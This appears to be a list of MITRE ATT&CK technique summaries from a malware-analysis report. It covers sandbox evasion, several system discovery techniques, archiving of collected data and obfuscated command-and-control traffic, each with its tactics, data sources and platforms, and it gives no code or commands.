Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre